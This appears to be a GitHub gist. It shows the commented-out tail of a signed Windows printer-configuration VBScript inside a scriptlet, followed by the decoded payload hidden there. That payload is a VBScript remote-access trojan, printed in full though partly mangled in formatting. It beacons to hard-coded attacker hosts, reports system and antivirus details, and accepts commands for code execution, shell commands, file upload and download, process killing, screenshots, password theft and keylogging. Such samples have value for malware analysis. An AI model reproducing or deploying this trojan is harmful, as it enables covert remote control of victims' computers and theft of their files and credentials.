' if oPrinter.EnableBiDi then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib10_Text
'
' end if
'
' if oPrinter.DoCompleteFirst then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib11_Text
'
' end if
'
' if oPrinter.WorkOffline then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib12_Text
'
' end if
'
' if oPrinter.Hidden then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib13_Text
'
' end if
'
' if oPrinter.EnableDevQueryPrint then
'
' strAttributes = strAttributes + L_Space_Text + L_Text_Msg_Attrib14_Text
'
' end if
'
'
' iRetval = kErrorSuccess
'
' else
'
' 'wscript.echo L_Text_Msg_General04_Text & L_Space_Text & oParamDict.Item(kPrinterName) & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' '
' ' Try getting extended error information
' '
' call LastError()
'
' end if
'
' GetPrinter = iRetval
'
'end function
'
''
'' Configure a printer
''
'function SetPrinter(oParamDict)
'
' on error resume next
'
' DebugPrint kDebugTrace, L_Text_Dbg_Msg04_Text
' DebugPrint kDebugTrace, L_Text_Msg_Printer01_Text & L_Space_Text & oParamDict.Item(kServerName)
' DebugPrint kDebugTrace, L_Text_Msg_Printer02_Text & L_Space_Text & oParamDict.Item(kPrinterName)
'
' dim oPrinter
' dim oService
' dim iRetval
' dim uResult
' dim strServer
' dim strPrinter
' dim strUser
' dim strPassword
'
' iRetval = kErrorFailure
'
' strServer = oParamDict.Item(kServerName)
' strPrinter = oParamDict.Item(kPrinterName)
' strNewName = oParamDict.Item(kNewPrinterName)
' strUser = oParamDict.Item(kUserName)
' strPassword = oParamDict.Item(kPassword)
'
' if WmiConnect(strServer, kNameSpace, strUser, strPassword, oService) then
'
' set oPrinter = oService.Get("Win32_Printer='" & strPrinter & "'")
'
' else
'
' SetPrinter = kErrorFailure
'
' exit function
'
' end if
'
' '
' ' Check if Get was successful
' '
' if Err.Number = kErrorSuccess then
'
' if oParamdict.Exists(kPortName) then oPrinter.PortName = oParamDict.Item(kPortName) end if
' if oParamdict.Exists(kDriverName) then oPrinter.DriverName = oParamDict.Item(kDriverName) end if
' if oParamdict.Exists(kShareName) then oPrinter.ShareName = oParamDict.Item(kShareName) end if
' if oParamdict.Exists(kLocation) then oPrinter.Location = oParamDict.Item(kLocation) end if
' if oParamdict.Exists(kComment) then oPrinter.Comment = oParamDict.Item(kComment) end if
' if oParamdict.Exists(kDataType) then oPrinter.PrintJobDataType = oParamDict.Item(kDataType) end if
' if oParamdict.Exists(kSepFile) then oPrinter.SeparatorFile = oParamDict.Item(kSepfile) end if
' if oParamdict.Exists(kParameters) then oPrinter.Parameters = oParamDict.Item(kParameters) end if
' if oParamdict.Exists(kPriority) then oPrinter.Priority = oParamDict.Item(kPriority) end if
' if oParamdict.Exists(kDefaultPriority) then oPrinter.DefaultPriority = oParamDict.Item(kDefaultPriority) end if
' if oParamdict.Exists(kPrintProc) then oPrinter.PrintProc = oParamDict.Item(kPrintProc) end if
' if oParamdict.Exists(kStartTime) then oPrinter.StartTime = oParamDict.Item(kStartTime) end if
' if oParamdict.Exists(kUntilTime) then oPrinter.UntilTime = oParamDict.Item(kUntilTime) end if
' if oParamdict.Exists(kQueued) then oPrinter.Queued = oParamDict.Item(kQueued) end if
' if oParamdict.Exists(kDirect) then oPrinter.Direct = oParamDict.Item(kDirect) end if
' if oParamdict.Exists(kShared) then oPrinter.Shared = oParamDict.Item(kShared) end if
' if oParamdict.Exists(kHidden) then oPrinter.Hidden = oParamDict.Item(kHidden) end if
' if oParamdict.Exists(kEnabledevq) then oPrinter.EnableDevQueryPrint = oParamDict.Item(kEnabledevq) end if
' if oParamdict.Exists(kKeepPrintedJobs) then oPrinter.KeepPrintedJobs = oParamDict.Item(kKeepPrintedJobs) end if
' if oParamdict.Exists(kDoCompleteFirst) then oPrinter.DoCompleteFirst = oParamDict.Item(kDoCompleteFirst) end if
' if oParamdict.Exists(kWorkOffline) then oPrinter.WorkOffline = oParamDict.Item(kWorkOffline) end if
' if oParamdict.Exists(kEnableBidi) then oPrinter.EnableBidi = oParamDict.Item(kEnableBidi) end if
' if oParamdict.Exists(kRawonly) then oPrinter.RawOnly = oParamDict.Item(kRawonly) end if
' if oParamdict.Exists(kPublished) then oPrinter.Published = oParamDict.Item(kPublished) end if
'
' oPrinter.Put_(kFlagUpdateOnly)
'
' if Err.Number = kErrorSuccess then
'
' 'wscript.echo L_Text_Msg_General06_Text & L_Space_Text & strPrinter
'
' iRetval = kErrorSuccess
'
' else
'
' 'wscript.echo L_Text_Msg_General07_Text & L_Space_Text & strPrinter & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' '
' ' Try getting extended error information
' '
' call LastError()
'
' end if
'
' else
'
' 'wscript.echo L_Text_Msg_General04_Text & L_Space_Text & strPrinter & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' '
' ' Try getting extended error information
' '
' call LastError()
'
' end if
'
' SetPrinter = iRetval
'
'end function
'
''
'' Converts the printer status to a string
''
'function PrnStatusToString(Status)
'
' dim str
'
' str = L_Empty_Text
'
' select case Status
'
' case 1
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 2
' str = str + L_Text_Msg_Status02_Text + L_Space_Text
'
' case 3
' str = str + L_Text_Msg_Status03_Text + L_Space_Text
'
' case 4
' str = str + L_Text_Msg_Status04_Text + L_Space_Text
'
' case 5
' str = str + L_Text_Msg_Status05_Text + L_Space_Text
'
' case 6
' str = str + L_Text_Msg_Status06_Text + L_Space_Text
'
' case 7
' str = str + L_Text_Msg_Status07_Text + L_Space_Text
'
' end select
'
' PrnStatusToString = str
'
'end function
'
''
'' Converts the extended printer status to a string
''
'function ExtPrnStatusToString(Status)
'
' dim str
'
' str = L_Empty_Text
'
' select case Status
'
' case 1
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 2
' str = str + L_Text_Msg_Status02_Text + L_Space_Text
'
' case 3
' str = str + L_Text_Msg_Status03_Text + L_Space_Text
'
' case 4
' str = str + L_Text_Msg_Status04_Text + L_Space_Text
'
' case 5
' str = str + L_Text_Msg_Status05_Text + L_Space_Text
'
' case 6
' str = str + L_Text_Msg_Status06_Text + L_Space_Text
'
' case 7
' str = str + L_Text_Msg_Status07_Text + L_Space_Text
'
' case 8
' str = str + L_Text_Msg_Status08_Text + L_Space_Text
'
' case 9
' str = str + L_Text_Msg_Status09_Text + L_Space_Text
'
' case 10
' str = str + L_Text_Msg_Status10_Text + L_Space_Text
'
' case 11
' str = str + L_Text_Msg_Status11_Text + L_Space_Text
'
' case 12
' str = str + L_Text_Msg_Status12_Text + L_Space_Text
'
' case 13
' str = str + L_Text_Msg_Status13_Text + L_Space_Text
'
' case 14
' str = str + L_Text_Msg_Status14_Text + L_Space_Text
'
' case 15
' str = str + L_Text_Msg_Status15_Text + L_Space_Text
'
' case 16
' str = str + L_Text_Msg_Status16_Text + L_Space_Text
'
' case 17
' str = str + L_Text_Msg_Status17_Text + L_Space_Text
'
' case 18
' str = str + L_Text_Msg_Status18_Text + L_Space_Text
'
' end select
'
' ExtPrnStatusToString = str
'
'end function
'
''
'' Converts the detected error state to a string
''
'function DetectedErrorStateToString(Status)
'
' dim str
'
' str = L_Empty_Text
'
' select case Status
'
' case 0
' str = str + L_Text_Msg_Status02_Text + L_Space_Text
'
' case 1
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 2
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 3
' str = str + L_Text_Msg_Status20_Text + L_Space_Text
'
' case 4
' str = str + L_Text_Msg_Status21_Text + L_Space_Text
'
' case 5
' str = str + L_Text_Msg_Status22_Text + L_Space_Text
'
' case 6
' str = str + L_Text_Msg_Status23_Text + L_Space_Text
'
' case 7
' str = str + L_Text_Msg_Status24_Text + L_Space_Text
'
' case 8
' str = str + L_Text_Msg_Status25_Text + L_Space_Text
'
' case 9
' str = str + L_Text_Msg_Status07_Text + L_Space_Text
'
' case 10
' str = str + L_Text_Msg_Status26_Text + L_Space_Text
'
' case 11
' str = str + L_Text_Msg_Status27_Text + L_Space_Text
'
' end select
'
' DetectedErrorStateToString = str
'
'end function
'
''
'' Converts the extended detected error state to a string
''
'function ExtDetectedErrorStateToString(Status)
'
' dim str
'
' str = L_Empty_Text
'
' select case Status
'
' case 0
' str = str + L_Text_Msg_Status02_Text + L_Space_Text
'
' case 1
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 2
' str = str + L_Text_Msg_Status01_Text + L_Space_Text
'
' case 3
' str = str + L_Text_Msg_Status20_Text + L_Space_Text
'
' case 4
' str = str + L_Text_Msg_Status21_Text + L_Space_Text
'
' case 5
' str = str + L_Text_Msg_Status22_Text + L_Space_Text
'
' case 6
' str = str + L_Text_Msg_Status23_Text + L_Space_Text
'
' case 7
' str = str + L_Text_Msg_Status24_Text + L_Space_Text
'
' case 8
' str = str + L_Text_Msg_Status25_Text + L_Space_Text
'
' case 9
' str = str + L_Text_Msg_Status07_Text + L_Space_Text
'
' case 10
' str = str + L_Text_Msg_Status26_Text + L_Space_Text
'
' case 11
' str = str + L_Text_Msg_Status27_Text + L_Space_Text
'
' case 12
' str = str + L_Text_Msg_Status28_Text + L_Space_Text
'
' case 13
' str = str + L_Text_Msg_Status29_Text + L_Space_Text
'
' case 14
' str = str + L_Text_Msg_Status30_Text + L_Space_Text
'
' case 15
' str = str + L_Text_Msg_Status31_Text + L_Space_Text
'
' case 16
' str = str + L_Text_Msg_Status32_Text + L_Space_Text
'
' end select
'
' ExtDetectedErrorStateToString = str
'
'end function
'
''
'' Debug display helper function
''
'sub DebugPrint(uFlags, strString)
'
' if gDebugFlag = true then
'
' if uFlags = kDebugTrace then
'
' 'wscript.echo L_Debug_Text & L_Space_Text & strString
'
' end if
'
' if uFlags = kDebugError then
'
' if Err <> 0 then
'
' 'wscript.echo L_Debug_Text & L_Space_Text & strString & L_Space_Text _
' & L_Error_Text & L_Space_Text & L_Hex_Text & hex(Err.Number) _
' & L_Space_Text & Err.Description
'
' end if
'
' end if
'
' end if
'
'end sub
'
''
'' Parse the command line into its components
''
'function ParseCommandLine(iAction, oParamdict)
'
' on error resume next
'
' DebugPrint kDebugTrace, L_Text_Dbg_Msg05_Text
'
' dim oArgs
' dim iIndex
'
' iAction = kActionUnknown
' iIndex = 0
'
' set oArgs = wscript.Arguments
'
' while iIndex < oArgs.Count
'
' select case oArgs(iIndex)
'
' case "-g"
' iAction = kActionGet
'
' case "-t"
' iAction = kActionSet
'
' case "-x"
' iAction = kActionRename
'
' case "-p"
' iIndex = iIndex + 1
' oParamdict.Add kPrinterName, oArgs(iIndex)
'
' case "-s"
' iIndex = iIndex + 1
' oParamdict.Add kServerName, RemoveBackslashes(oArgs(iIndex))
'
' case "-r"
' iIndex = iIndex + 1
' oParamdict.Add kPortName, oArgs(iIndex)
'
' case "-h"
' iIndex = iIndex + 1
' oParamdict.Add kShareName, oArgs(iIndex)
'
' case "-m"
' iIndex = iIndex + 1
' oParamdict.Add kComment, oArgs(iIndex)
'
' case "-l"
' iIndex = iIndex + 1
' oParamdict.Add kLocation, oArgs(iIndex)
'
' case "-y"
' iIndex = iIndex + 1
' oParamdict.Add kDataType, oArgs(iIndex)
'
' case "-f"
' iIndex = iIndex + 1
' oParamdict.Add kSepFile, oArgs(iIndex)
'
' case "-z"
' iIndex = iIndex + 1
' oParamdict.Add kNewPrinterName, oArgs(iIndex)
'
' case "-u"
' iIndex = iIndex + 1
' oParamdict.Add kUserName, oArgs(iIndex)
'
' case "-w"
' iIndex = iIndex + 1
' oParamdict.Add kPassword, oArgs(iIndex)
'
' case "-st"
' iIndex = iIndex + 1
' oParamdict.Add kStartTime, "********" & oArgs(iIndex) & "00.000000+000"
'
' case "-o"
' iIndex = iIndex + 1
' oParamdict.Add kPriority, oArgs(iIndex)
'
' case "-i"
' iIndex = iIndex + 1
' oParamdict.Add kDefaultPriority, oArgs(iIndex)
'
' case "-ut"
' iIndex = iIndex + 1
' oParamdict.Add kUntilTime, "********" & oArgs(iIndex) & "00.000000+000"
'
' case "-queued"
' oParamdict.Add kQueued, false
'
' case "+queued"
' oParamdict.Add kQueued, true
'
' case "-direct"
' oParamdict.Add kDirect, false
'
' case "+direct"
' oParamdict.Add kDirect, true
'
' case "-shared"
' oParamdict.Add kShared, false
'
' case "+shared"
' oParamdict.Add kShared, true
'
' case "-hidden"
' oParamdict.Add kHidden, false
'
' case "+hidden"
' oParamdict.Add kHidden, true
'
' case "-enabledevq"
' oParamdict.Add kEnabledevq, false
'
' case "+enabledevq"
' oParamdict.Add kEnabledevq, true
'
' case "-keepprintedjobs"
' oParamdict.Add kKeepprintedjobs, false
'
' case "+keepprintedjobs"
' oParamdict.Add kKeepprintedjobs, true
'
' case "-docompletefirst"
' oParamdict.Add kDocompletefirst, false
'
' case "+docompletefirst"
' oParamdict.Add kDocompletefirst, true
'
' case "-workoffline"
' oParamdict.Add kWorkoffline, false
'
' case "+workoffline"
' oParamdict.Add kWorkoffline, true
'
' case "-enablebidi"
' oParamdict.Add kEnablebidi, false
'
' case "+enablebidi"
' oParamdict.Add kEnablebidi, true
'
' case "-rawonly"
' oParamdict.Add kRawonly, false
'
' case "+rawonly"
' oParamdict.Add kRawonly, true
'
' case "-published"
' oParamdict.Add kPublished, false
'
' case "+published"
' oParamdict.Add kPublished, true
'
' case "-?"
' Usage(true)
' exit function
'
' case else
' Usage(true)
' exit function
'
' end select
'
' iIndex = iIndex + 1
'
' wend
'
' if Err = kErrorSuccess then
'
' ParseCommandLine = kErrorSuccess
'
' else
'
' 'wscript.echo L_Text_Error_General02_Text & L_Space_Text & L_Error_Text & L_Space_Text _
' & L_Hex_Text & hex(Err.Number) & L_Space_text & Err.Description
'
' ParseCommandLine = kErrorFailure
'
' end if
'
'end function
'
''
'' Display command usage.
''
'sub Usage(bExit)
'
'
'
' if bExit then
'
' wscript.quit(1)
'
' end if
'
'end sub
'
''
'' Determines which program is being used to run this script.
'' Returns true if the script host is cscript.exe
''
'function IsHostCscript()
'
' on error resume next
'
' dim strFullName
' dim strCommand
' dim i, j
' dim bReturn
'
' bReturn = false
'
' strFullName = WScript.FullName
'
' i = InStr(1, strFullName, ".exe", 1)
'
' if i <> 0 then
'
' j = InStrRev(strFullName, "\", i, 1)
'
' if j <> 0 then
'
' strCommand = Mid(strFullName, j+1, i-j-1)
'
' if LCase(strCommand) = "cscript" then
'
' bReturn = true
'
' end if
'
' end if
'
' end if
'
' if Err <> 0 then
'
' 'wscript.echo L_Text_Error_General01_Text & L_Space_Text & L_Error_Text & L_Space_Text _
' & L_Hex_Text & hex(Err.Number) & L_Space_Text & Err.Description
'
' end if
'
' IsHostCscript = bReturn
'
'end function
'
''
'' Retrieves extended information about the last error that occurred
'' during a WBEM operation. The methods that set an SWbemLastError
'' object are GetObject, PutInstance, DeleteInstance
''
'sub LastError()
'
' on error resume next
'
' dim oError
'
' set oError = CreateObject("WbemScripting.SWbemLastError")
'
' if Err = kErrorSuccess then
'
' 'wscript.echo L_Operation_Text & L_Space_Text & oError.Operation
' 'wscript.echo L_Provider_Text & L_Space_Text & oError.ProviderName
' 'wscript.echo L_Description_Text & L_Space_Text & oError.Description
' 'wscript.echo L_Text_Error_General03_Text & L_Space_Text & oError.StatusCode
'
' end if
'
'end sub
'
''
'' Connects to the WMI service on a server. oService is returned as a service
'' object (SWbemServices)
''
'function WmiConnect(strServer, strNameSpace, strUser, strPassword, oService)
'
' on error resume next
'
' dim oLocator
' dim bResult
'
' oService = null
'
' bResult = false
'
' set oLocator = CreateObject("WbemScripting.SWbemLocator")
'
' if Err = kErrorSuccess then
'
' set oService = oLocator.ConnectServer(strServer, strNameSpace, strUser, strPassword)
'
' if Err = kErrorSuccess then
'
' bResult = true
'
' oService.Security_.impersonationlevel = 3
'
' '
' ' Required to perform administrative tasks on the spooler service
' '
' oService.Security_.Privileges.AddAsString "SeLoadDriverPrivilege"
'
' Err.Clear
'
' else
'
' 'wscript.echo L_Text_Msg_General08_Text & L_Space_Text & L_Error_Text _
' & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' end if
'
' else
'
' 'wscript.echo L_Text_Msg_General09_Text & L_Space_Text & L_Error_Text _
' & L_Space_Text & L_Hex_Text & hex(Err.Number) & L_Space_Text _
' & Err.Description
'
' end if
'
' WmiConnect = bResult
'
'end function
'
''
'' Remove leading "\\" from server name
''
'function RemoveBackslashes(strServer)
'
' dim strRet
'
' strRet = strServer
'
' if Left(strServer, 2) = "\\" and Len(strServer) > 2 then
'
' strRet = Mid(strServer, 3)
'
' end if
'
' RemoveBackslashes = strRet
'
'end function
'
'
'' SIG '' Begin signature block
''' SIG '' MIIZMAYJKoZIhvcNAQcCoIIZITCCGR0CAQExDjAMBggq
''' SIG '' hkiG9w0CBQUAMGYGCisGAQQBgjcCAQSgWDBWMDIGCisG
''' SIG '' AQQBgjcCAR4wJAIBAQQQTvApFpkntU2P5azhDxfrqwIB
''' SIG '' AAIBAAIBAAIBAAIBADAgMAwGCCqGSIb3DQIFBQAEEOLm
''' SIG '' 4j+9BLdGEED7+fyvFSygghQ4MIICvDCCAiUCEEoZ0jiM
''' SIG '' glkcpV1zXxVd3KMwDQYJKoZIhvcNAQEEBQAwgZ4xHzAd
''' SIG '' BgNVBAoTFlZlcmlTaWduIFRydXN0IE5ldHdvcmsxFzAV
''' SIG '' BgNVBAsTDlZlcmlTaWduLCBJbmMuMSwwKgYDVQQLEyNW
''' SIG '' ZXJpU2lnbiBUaW1lIFN0YW1waW5nIFNlcnZpY2UgUm9v
''' SIG '' dDE0MDIGA1UECxMrTk8gTElBQklMSVRZIEFDQ0VQVEVE
''' SIG '' LCAoYyk5NyBWZXJpU2lnbiwgSW5jLjAeFw05NzA1MTIw
''' SIG '' MDAwMDBaFw0wNDAxMDcyMzU5NTlaMIGeMR8wHQYDVQQK
''' SIG '' ExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMRcwFQYDVQQL
''' SIG '' Ew5WZXJpU2lnbiwgSW5jLjEsMCoGA1UECxMjVmVyaVNp
''' SIG '' Z24gVGltZSBTdGFtcGluZyBTZXJ2aWNlIFJvb3QxNDAy
''' SIG '' BgNVBAsTK05PIExJQUJJTElUWSBBQ0NFUFRFRCwgKGMp
''' SIG '' OTcgVmVyaVNpZ24sIEluYy4wgZ8wDQYJKoZIhvcNAQEB
''' SIG '' BQADgY0AMIGJAoGBANMuIPBofCwtLoEcsQaypwu3EQ1X
''' SIG '' 2lPYdePJMyqy1PYJWzTz6ZD+CQzQ2xtauc3n9oixncCH
''' SIG '' Z0JIppAQ5L9h+JxT5ZPRcz/4/Z1PhKxV0f0RY2MwggQC
''' SIG '' MIIDa6ADAgECAhAIem1cb2KTT7rE/UPhFBidMA0GCSqG
''' SIG '' SIb3DQEBBAUAMIGeMR8wHQYDVQQKExZWZXJpU2lnbiBU
''' SIG '' cnVzdCBOZXR3b3JrMRcwFQYDVQQLEw5WZXJpU2lnbiwg
''' SIG '' SW5jLjEsMCoGA1UECxMjVmVyaVNpZ24gVGltZSBTdGFt
''' SIG '' cGluZyBTZXJ2aWNlIFJvb3QxNDAyBgNVBAsTK05PIExJ
''' SIG '' QUJJTElUWSBBQ0NFUFRFRCwgKGMpOTcgVmVyaVNpZ24s
''' SIG '' IEluYy4wHhcNMDEwMjI4MDAwMDAwWhcNMDQwMTA2MjM1
''' SIG '' OTU5WjCBoDEXMBUGA1UEChMOVmVyaVNpZ24sIEluYy4x
''' SIG '' HzAdBgNVBAsTFlZlcmlTaWduIFRydXN0IE5ldHdvcmsx
''' SIG '' OzA5BgNVBAsTMlRlcm1zIG9mIHVzZSBhdCBodHRwczov
...
''' SIG '' vSRK4Mpa/gWTKBapOlzdKcI=
''' SIG '' End signature block
End Function
</script>
</registration>
</scriptlet>
## Decodes to:
host = array("mighty-dead.ddns.net:535", "149.28.14.103:535", "mighty-dead.spdns.de:535")
dim r7
set r7 = createobject("wscript.shell")
dim w1
set w1 = createobject("scripting.filesystemobject")
dim x3
set x3 = createobject("msxml2.xmlhttp")
spliter = "<" & "|" & ">"
dim n9
dim i8
dim wd
info = ""
usbspreading = ""
startdate = ""
dim u9
dns = 0
on error resume next
o7
while true
i5
n9 = ""
n9 = o4("is-ready", b9)
if x3.status < > 200 then
if dns >= ubound(host) then
dns = 0
else
dns = dns + 1
end
if
end
if
i8 = split(n9, spliter)
select
case i8(0)
case "excecute"
wd = i8(1)
execute wd
case "update"
wd = i8(1)
u9.close
set u9 = w1.opentextfile(installdir & installname, 2, false)
u9.write wd
u9.close
wscript.quit
case "uninstall"
c8
case "send"
r3 i8(1), i8(2)
case "site-send"
v4 i8(1), i8(2)
case "recv"
wd = i8(1)
p9(wd)
case "enum-driver"
o4 "is-enum-driver", x8
case "enum-faf"
wd = i8(1)
o4 "is-enum-faf", g2(wd)
case "enum-process"
o4 "is-enum-process", w2
case "i8-shell"
wd = i8(1)
o4 "is-i8-shell", g7(wd)
case "delete"
wd = i8(1)
s3(wd)
case "exit-process"
wd = i8(1)
p2(wd)
case "screen-shot"
k7 i8(1), i8(2), i8(3)
case "password"
w4
case "keylogger"
c8
end select
wend
function o4(i8, wd)
o4 = wd
x3.open "post", "http://" & host(dns) & "/" & i8, false
x3.send wd
o4 = x3.responsetext
end
function
function b9
on error resume next
if inf = ""
then
inf = c0 & spliter
inf = inf & r7.expandenvironmentstrings("%computername%") & spliter
inf = inf & r7.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit
for
next
inf = inf & "plus" & spliter
inf = inf & o1 & spliter
inf = inf & usbspreading
b9 = inf
else
b9 = inf
end
if
end
function
sub h4()
on error resume Next
w1.copyfile wscript.scriptfullname, installdir & installname, true
end sub
function c0
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber < > ""
then
c0 = disk.volumeserialnumber
exit
for
end
if
next
end
function
function o1
on error resume next
o1 = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem", , 48)
for each v3 in colitems
versionstr = split(v3.version, ".")
next
versionstr = split(colitems.version, ".")
osversion = versionstr(0) & "."
for z1 = 1 to ubound(versionstr)
osversion = osversion & versionstr(i)
next
osversion = eval(osversion)
if osversion > 6 then sc = "securitycenter2"
else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct", "wql", 0) for each objantivirus in colantivirus o1 = o1 & objantivirus.displayname & " ."
next
if o1 = ""
then o1 = "nan-av"
end
function
sub r3(a4, q8) if q8 = ""
then q8 = installdir end
if strsaveto = q8 & mid(a4, instrrev(a4, "\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp") objhttpdownload.open "post", "http://" & host(dns) & "/" & "is-sending" & spliter & a4, false objhttpdownload.send ""
set objfsodownload = createobject("scripting.filesystemobject") if objfsodownload.fileexists(strsaveto) then objfsodownload.deletefile(strsaveto) end
if if objhttpdownload.status = 200 then dim g0 set g0 = createobject("adodb.stream") with g0
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close end with set g0 = nothing end
if 'if objfsodownload.fileexists(strsaveto) then
'r7.run objfsodownload.getfile (strsaveto).shortpath
'end if
end sub
function p9(a4) dim t2, x5 set t2 = createobject("adodb.stream") with t2
.type = 1
.open
.loadfromfile a4 x5 = .read
.close end with set g0 = nothing o4 "is-recving" & spliter & a4, x5 end
function
function x8() for each drive in w1.drives
if drive.isready = true then x8 = x8 & drive.path & "|" & drive.drivetype & spliter end
if next end Function
function g2(l0) g2 = l0 & spliter
for each folder in w1.getfolder(l0).subfolders g2 = g2 & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter next
for each file in w1.getfolder(l0).files g2 = g2 & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter next end
function
function w2() on error resume next set objwmiservice = getobject("winmgmts:\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_process", , 48) dim v3
for each v3 in colitems w2 = w2 & v3.name & "|"
w2 = w2 & v3.processid & "|"
w2 = w2 & v3.executablepath & spliter next end
function sub p2(b1) on error resume next r7.run "taskkill /F /T /PID " & b1, 7, true end sub sub s3(i1) on error resume next w1.deletefile i1 w1.deletefolder i1 end sub
function g7(i8) dim x3, c2, t_ set c2 = r7.exec("%comspec% /c " & i8) if not c2.stdout.atendofstream then t_ = c2.stdout.readall elseif not c2.stderr.atendofstream then t_ = c2.stderr.readall
else
t_ = ""
end
if g7 = t_ end Function
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment